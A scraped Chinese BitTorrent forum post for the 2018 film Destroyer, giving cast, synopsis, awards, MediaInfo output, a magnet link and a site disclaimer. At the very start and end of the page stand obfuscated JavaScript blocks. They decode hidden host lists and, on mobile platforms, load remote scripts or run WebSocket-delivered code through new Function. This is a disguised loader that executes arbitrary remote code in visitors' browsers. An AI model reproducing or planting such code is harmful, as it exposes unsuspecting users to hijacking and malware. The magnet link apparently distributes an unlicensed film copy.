无间炼狱[中文字幕].Destroyer.2018.1080p.BluRay.x265.10bit.DTS 7.40GB

版主小s 24天前 230

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 无间炼狱 / 摧毁者

◎片 名 Destroyer

◎年 代 2018

◎产 地 美国

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2018-08-31(特柳赖德电影节) / 2018-12-25(美国)

◎IMDb链接 https://www.imdb.com/title/tt7137380/

◎豆瓣评分 5.8/10 (2730人评价)

◎豆瓣链接 https://movie.douban.com/subject/27109553/

◎片 长 123分钟

◎导 演 卡瑞恩·库萨马 Karyn Kusama (id:1000473)

◎编 剧 费尔·海伊 Phil Hay (id:1276624)

马特·曼弗莱迪 Matt Manfredi (id:1290866)

◎演 员 妮可·基德曼 Nicole Kidman (id:1054442)

托比·凯贝尔 Toby Kebbell (id:1010533)

塔提阿娜·玛斯拉尼 Tatiana Maslany (id:1225652)

塞巴斯蒂安·斯坦 Sebastian Stan (id:1021985)

斯科特·麦克纳里 Scoot McNairy (id:1302972)

布莱德利·惠特福德 Bradley Whitford (id:1027158)

托比·哈斯 Toby Huss (id:1108969)

詹姆斯·乔丹 James Jordan (id:1254272)

博·纳普 Beau Knapp (id:1342556)

杰德·佩蒂约翰 Jade Pettyjohn (id:1345905)

沙米尔·安德森 Shamier Anderson (id:1398621)

娜塔丽·科尔多瓦 Natalia Cordova (id:1263061)

余朝汉 Kelvin Han Yee (id:1342894)

简·霍格 Jan Hoag (id:1099491)

米奇·奥黑根 Mickey O'Hagan (id:1353064)

布兰顿·莫拉莱斯 Brandon Morales (id:1326005)

杰伊·赫农 Jay Hieron (id:1371426)

乔治·格里菲斯 George Griffith (id:1387903)

布瑞恩·汉福德 Brian Hanford (id:1408177)

寇比·法兰奇 Colby French (id:1350065)

丹尼尔·索斯沃思 Dan Southworth (id:1159987)

莫妮克·盖尔 Monique Gall (id:1393731)

扎克·维拉 Zach Villa (id:1414252)

西奥多·沙皮洛 Theodore Shapiro (id:1028276)

◎标 签 犯罪 / 美国 / 剧情 / 警匪 / 2018 / 惊悚 / 女性 / 悬疑

◎简 介

作为一名初出茅庐的警察,洛杉矶警局警探艾琳·贝尔(妮可·基德曼)和她的搭档以卧底身份潜伏在位于加利福尼亚州沙漠中一个臭名昭着的犯罪团伙中,该团伙由极度恐怖且喜怒无常的塞拉斯领导。多年以后,艾琳仍未走出过去梦魇般的经历所带来的创伤,而塞拉斯的重新露面却让她被迫面对心中的恶魔。她不情愿地重新调查痛苦的往事,去寻找她团队的其他成员,竭立找寻塞拉斯的下落,最终了结了这起几乎毁了她的案件。在闷热的气氛和窒息的预兆中,这部精良的悲观侦探故事可以说是库莎玛至今完成度最高且细腻的电影,不禁让人回想起加利福尼亚州的犯罪经典电影,《唐人街》和《洛城生死斗》。但与这些睾丸激素驱动的铁汉电影不同,毁灭者是一个鲜明的女性故事,再一次证明了库莎玛将女性置于叙事中心的承诺,正如《魔力战士》和《詹妮佛肉体》等多样化的作品所展现的那样。而这一次,库莎玛得到了基德曼的大力支持,基德曼的...

◎获奖情况 (共3项)

第76届金球奖 (2019)

电影类 剧情片最佳女主角(提名)

└──妮可·基德曼 (id:1054442)

第43届多伦多国际电影节 (2018)

站台奖(提名)

└──卡瑞恩·库萨马 (id:1000473)

第23届金卫星奖 (2019)

电影部门 剧情片最佳女主角(提名)

└──妮可·基德曼 (id:1054442)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 293825496887498610785422787079155785011 (0xDD0CBB773A1AD3CF316DB8AD91989D33)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.39 GiB

  8. Duration : 2 h 0 min

  9. Overall bit rate : 8 752 kb/s

  10. Encoded date : UTC 2021-11-06 13:22:55

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 7

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 0 min

  20. Bit rate : 7 184 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.195

  30. Stream size : 6.07 GiB (82%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=20.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 1

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 2 h 0 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.27 GiB (17%)

  52. Language : English

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 2

  58. ID in the original source medium : 4608 (0x1200)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 59 min

  64. Bit rate : 27.3 kb/s

  65. Count of elements : 2832

  66. Stream size : 23.3 MiB (0%)

  67. Language : English

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 3

  73. ID in the original source medium : 4614 (0x1206)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 50 min

  79. Bit rate : 32.8 kb/s

  80. Count of elements : 1750

  81. Stream size : 25.8 MiB (0%)

  82. Language : Chinese

  83. Default : No

  84. Forced : No

  85. Original source medium : Blu-ray


  86. Text #3

  87. ID : 4

  88. ID in the original source medium : 4615 (0x1207)

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 50 min

  94. Bit rate : 33.0 kb/s

  95. Count of elements : 1750

  96. Stream size : 26.0 MiB (0%)

  97. Language : Chinese

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #4

  102. ID : 5

  103. ID in the original source medium : 4616 (0x1208)

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 50 min

  109. Bit rate : 19.7 kb/s

  110. Count of elements : 1749

  111. Stream size : 15.5 MiB (0%)

  112. Language : Chinese

  113. Default : No

  114. Forced : No

  115. Original source medium : Blu-ray


  116. Text #5

  117. ID : 6

  118. ID in the original source medium : 4617 (0x1209)

  119. Format : PGS

  120. Muxing mode : zlib

  121. Codec ID : S_HDMV/PGS

  122. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration : 1 h 50 min

  124. Bit rate : 19.9 kb/s

  125. Count of elements : 1749

  126. Stream size : 15.7 MiB (0%)

  127. Language : Chinese

  128. Default : No

  129. Forced : No

  130. Original source medium : Blu-ray


  131. Menu

  132. 00:00:00.000 : en:第 01 章

  133. 00:03:03.975 : en:第 02 章

  134. 00:07:04.382 : en:第 03 章

  135. 00:13:54.375 : en:第 04 章

  136. 00:16:46.630 : en:第 05 章

  137. 00:22:16.960 : en:第 06 章

  138. 00:27:02.829 : en:第 07 章

  139. 00:30:16.606 : en:第 08 章

  140. 00:34:01.164 : en:第 09 章

  141. 00:40:25.631 : en:第 10 章

  142. 00:50:06.253 : en:第 11 章

  143. 00:53:03.555 : en:第 12 章

  144. 00:56:58.915 : en:第 13 章

  145. 01:05:17.914 : en:第 14 章

  146. 01:08:13.714 : en:第 15 章

  147. 01:11:42.923 : en:第 16 章

  148. 01:15:24.978 : en:第 17 章

  149. 01:19:43.069 : en:第 18 章

  150. 01:24:10.295 : en:第 19 章

  151. 01:27:42.298 : en:第 20 章

  152. 01:35:08.244 : en:第 21 章

  153. 01:43:31.705 : en:第 22 章

  154. 01:45:46.506 : en:第 23 章

  155. 01:54:03.419 : en:第 24 章




复制代码


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:92FC01E2F395D961C15806CF52694578D9972F10

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};